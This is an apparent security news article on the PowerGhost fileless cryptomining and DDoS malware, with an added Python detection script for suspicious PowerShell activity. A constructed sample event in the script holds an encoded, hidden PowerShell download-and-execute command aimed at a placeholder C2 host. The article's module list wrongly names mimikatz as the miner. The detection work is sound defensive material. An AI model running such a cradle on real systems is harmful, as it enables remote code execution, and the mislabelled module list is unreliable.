The newly discovered PowerGhost malware is spreading across corporate networks, infecting both workstations and servers to illegally mine cryptocurrency and perform DDoS attacks.
Cybercriminals are targeting a large number of corporate networks to mine cryptocurrency and launch DDoS attacks, generating huge profits.
In this case, the attackers use fileless malware techniques to maintain persistence and bypass antivirus detection, and they exploit vulnerabilities in corporate networks using known exploits such as EternalBlue.
The PowerGhost miner is encountered most often in India, Brazil, Colombia, and Turkey, and has infected the local area networks of a large number of corporate companies.
PowerGhost Malware Infection Techniques
Initially, victims are infected either through remote administration tools or remotely via exploits; a PowerShell script then downloads the miner and immediately launches it without writing it to the hard drive, which is the fileless technique noted above.
PowerGhost is an obfuscated PowerShell script that contains a number of core modules, such as miners, libraries for mining operations, and modules for PE file injection and the EternalBlue exploit:
- Miner – mimikatz
- Libraries – msvcp120.dll and msvcr120.dll
- PE injection and shellcode
The script runs in several stages and is capable of self-updating its modules: it keeps checking its C2 server, and if it finds a new version there, it automatically updates itself.
According to Kaspersky, with the help of mimikatz the miner obtains user account credentials from the current machine, uses them to log on, and attempts to propagate across the local network by launching a copy of itself via WMI and downloading the miner body from the C2 server.
PowerGhost also tries to spread across the local network using the EternalBlue exploit (MS17-010, CVE-2017-0144).
Once it lands on a new system, it escalates its privileges with 32- or 64-bit exploits for MS16-032, MS15-051, and CVE-2018-8120. Finally, the script launches the miner by loading a PE file via reflective PE injection.
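The infection chain above leaves a recognisable trail in process-creation telemetry: a hidden, profile-less PowerShell launched by the WMI provider host, carrying an encoded command that pulls its body from a C2 server. The following detection example is added here and is not code from the article or from Kaspersky; it assumes Sysmon-style process-creation events with `image`, `parent_image` and `command_line` fields, the sample events are constructed, and the C2 hostname is a placeholder. The scoring thresholds and indicator names are the editor's own choices, not values from the report.

```python
"""Score Windows process-creation events for the PowerGhost-style behaviours
described above: WMI-launched shells, encoded/hidden PowerShell, download
cradles and reflective PE loading. Sample events are constructed, not real logs."""
import base64
import re


def encode_ps(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects (UTF-16LE, base64).
    Used here only to build the constructed sample event below."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed Sysmon-style process-creation events (not real logs); the C2 host is a placeholder.
SAMPLE_EVENTS = [
    {   # WMI-launched, hidden, encoded PowerShell pulling a script from a C2: the pattern in the article
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        "command_line": "powershell.exe -nop -w hidden -enc "
        + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/p.ps1')"),
    },
    {   # Benign backup script launched by a user from Explorer
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": r"powershell.exe -File C:\scripts\backup.ps1",
    },
    {   # Remote WMI launch of cmd.exe: worth a look, but on its own not enough to alert
        "image": r"C:\Windows\System32\cmd.exe",
        "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        "command_line": "cmd.exe /c whoami",
    },
]

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# Indicator name -> pattern searched in the command line plus any decoded payload
SUSPICIOUS_TOKENS = {
    "download_cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "reflective_load": re.compile(
        r"virtualalloc|invoke-reflectivepeinjection|\[system\.reflection\.assembly\]::load", re.I),
}


def decode_encoded_command(command_line: str):
    """Return the decoded -EncodedCommand payload (UTF-16LE base64), or None if absent/invalid."""
    m = ENC_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event: dict):
    """Return (score, findings): one point per indicator observed in the event."""
    findings = []
    cmd = event["command_line"]
    image = event["image"].lower()
    parent = event["parent_image"].lower()
    # A shell whose parent is the WMI provider host is how a remote WMI launch shows up
    if parent.endswith("wmiprvse.exe") and image.endswith(("powershell.exe", "cmd.exe")):
        findings.append("shell spawned by WMI provider host")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append("encoded PowerShell command")
    # Search the decoded payload as well, so encoding does not hide the cradle
    text = cmd if decoded is None else cmd + " " + decoded
    for name, pattern in SUSPICIOUS_TOKENS.items():
        if pattern.search(text):
            findings.append(name)
    return len(findings), findings


def triage(events, threshold: int = 3):
    """Return events scoring at or above threshold, highest score first."""
    results = []
    for ev in events:
        score, findings = score_event(ev)
        if score >= threshold:
            results.append({"command_line": ev["command_line"], "score": score, "findings": findings})
    return sorted(results, key=lambda r: r["score"], reverse=True)


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["score"], hit["findings"])
        print("    ", hit["command_line"][:80])
```

A single indicator (a WMI-spawned `cmd.exe`, say) is routine in many environments, which is why the example requires several to co-occur before reporting; the decoded payload is included in the search so that base64 encoding alone does not defeat the download-cradle match.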
Researchers also found a tool for conducting DDoS attacks in one version of PowerGhost, used to make extra money on top of the mining profit.
Indicators of compromise